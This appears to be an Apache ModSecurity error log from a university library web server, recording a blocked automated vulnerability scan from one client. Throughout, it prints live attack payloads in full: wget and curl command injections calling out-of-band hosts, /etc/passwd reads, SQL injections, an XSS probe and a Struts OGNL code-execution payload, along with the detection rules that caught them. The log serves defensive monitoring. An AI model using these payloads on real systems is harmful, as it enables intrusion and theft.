[Tue Aug 29 11:33:31.528596 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ` found within XML: \\x0a    \\x0a    foo\\x0a    \\x0a        \\x0a            \\x0a                2\\x0a                \\x0a                    \\x0a                        \\x0a                            mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\\x0a                            \\x0a                                \\x0a                                \\x0a                                Compare\\x0a                                \\x0a                                \\..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTA [hostname "perpustakaan.unla.ac.id"] [uri "/sitecore/shell/ClientBin/Reporting/Report.ashx"] [unique_id "ZO11G8Co-f0AAAQKOmAAAAAs"]
[Tue Aug 29 11:33:32.029739 2023] [:error] [pid 1099] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:username:  `cat/etc/passwd`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/login"] [unique_id "ZO11HMCo-f0AAARLXx8AAAAQ"]
[Tue Aug 29 11:33:32.070950 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:key: ;'wget http:/cjmn8l5jmimk2adbbnlguykob9i6yun7b.oast.site;'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/cgi-bin/mesh.cgi"] [unique_id "ZO11HMCo-f0AAANsAg8AAAAD"]
[Tue Aug 29 11:33:32.400859 2023] [:error] [pid 1119] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS_NAMES:user_password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: user_password found within ARGS_NAMES:user_password: user_password"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/login/dologin"] [unique_id "ZO11HMCo-f0AAARfwnQAAAAI"]
[Tue Aug 29 11:33:34.360757 2023] [:error] [pid 1152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/jexws/jexws.jsp"] [unique_id "ZO11HsCo-f0AAASAHaEAAAAH"]
[Tue Aug 29 11:33:35.335429 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/jexws4/jexws4.jsp"] [unique_id "ZO11H8Co-f0AAARA7hgAAAAA"]
[Tue Aug 29 11:33:35.373173 2023] [:error] [pid 905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO11H8Co-f0AAAOJKesAAAAE"]
[Tue Aug 29 11:33:35.411451 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:old. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:old: test|cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/password_change.cgi"] [unique_id "ZO11H8Co-f0AAARjjN4AAAAL"]
[Tue Aug 29 11:33:36.334698 2023] [:error] [pid 1135] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/jexinv4/jexinv4.jsp"] [unique_id "ZO11IMCo-f0AAARv7TYAAAAY"]
[Tue Aug 29 11:33:36.367524 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/cgi-bin/status"] [unique_id "ZO11IMCo-f0AAARjjOEAAAAL"]
[Tue Aug 29 11:33:37.343416 2023] [:error] [pid 1153] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/jbossass/jbossass.jsp"] [unique_id "ZO11IcCo-f0AAASBXQ4AAAAM"]
[Tue Aug 29 11:33:37.352256 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/cgi-bin/stats"] [unique_id "ZO11IcCo-f0AAANsAiMAAAAD"]
[Tue Aug 29 11:33:37.384133 2023] [:error] [pid 1150] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id: 1 AND (SELECT 1 FROM (SELECT(SLEEP(6)))A)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/chopslider/get_script/index.php"] [unique_id "ZO11IcCo-f0AAAR@KGUAAAAF"]
[Tue Aug 29 11:33:38.429980 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/cgi-bin/test"] [unique_id "ZO11IsCo-f0AAARjjOkAAAAL"]
[Tue Aug 29 11:33:39.326890 2023] [:error] [pid 1150] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/cgi-bin/status/status.cgi"] [unique_id "ZO11I8Co-f0AAAR@KGsAAAAF"]
[Tue Aug 29 11:33:40.324639 2023] [:error] [pid 1153] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:id: YHLbGR%{128*128}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO11JMCo-f0AAASBXRsAAAAM"]
[Tue Aug 29 11:33:40.339280 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:USERDBDomains.Domainname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'MwLj'='MwLj found within ARGS:USERDBDomains.Domainname: geardomain' AND '5434'='5435' AND 'MwLj'='MwLj"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/scgi-bin/platform.cgi"] [unique_id "ZO11JMCo-f0AAARtAAIAAAAV"]
[Tue Aug 29 11:33:40.422955 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/test.cgi"] [unique_id "ZO11JMCo-f0AAARA7isAAAAA"]
[Tue Aug 29 11:33:41.304157 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %\\xe9\\x8c\\xa6'  found within ARGS:query: aa%\\xe9\\x8c\\xa6' union select 1,md5(999999999),3#'"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/plus/ajax_common.php"] [unique_id "ZO11JcCo-f0AAARy-xwAAAAb"]
[Tue Aug 29 11:33:41.429659 2023] [:error] [pid 1135] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:USERDBDomains.Domainname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '5434'='5434 found within ARGS:USERDBDomains.Domainname: geardomain' AND '5434'='5434' AND 'MwLj'='MwLj"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/scgi-bin/platform.cgi"] [unique_id "ZO11JcCo-f0AAARv7VQAAAAY"]
[Tue Aug 29 11:33:42.296518 2023] [:error] [pid 1150] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/debug.cgi"] [unique_id "ZO11JsCo-f0AAAR@KHcAAAAF"]
[Tue Aug 29 11:33:43.372374 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/cgi-bin/test-cgi"] [unique_id "ZO11J8Co-f0AAARdiLMAAAAK"]
[Tue Aug 29 11:33:45.473080 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:topicId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:topicId: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/widgets/knowledgebase"] [unique_id "ZO11KcCo-f0AAARy-zoAAAAb"]
[Tue Aug 29 11:33:47.305465 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:calendarId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  (5440=5440 found within ARGS:calendarId: 1) AND (SELECT 2065 FROM (SELECT(SLEEP(6)))jtGw) AND (5440=5440"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11K8Co-f0AAARjjRYAAAAL"]
[Tue Aug 29 11:33:47.332424 2023] [:error] [pid 1137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ssid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:ssid: \\x22'; curl http:/cjmn8l5jmimk2adbbnlg8asih194mdydn.oast.site -H 'User-Agent: CRvF1U' #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO11K8Co-f0AAARxOrYAAAAa"]
[Tue Aug 29 11:33:48.350315 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphon [hostname "perpustakaan.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11LMCo-f0AAARjjR4AAAAL"]
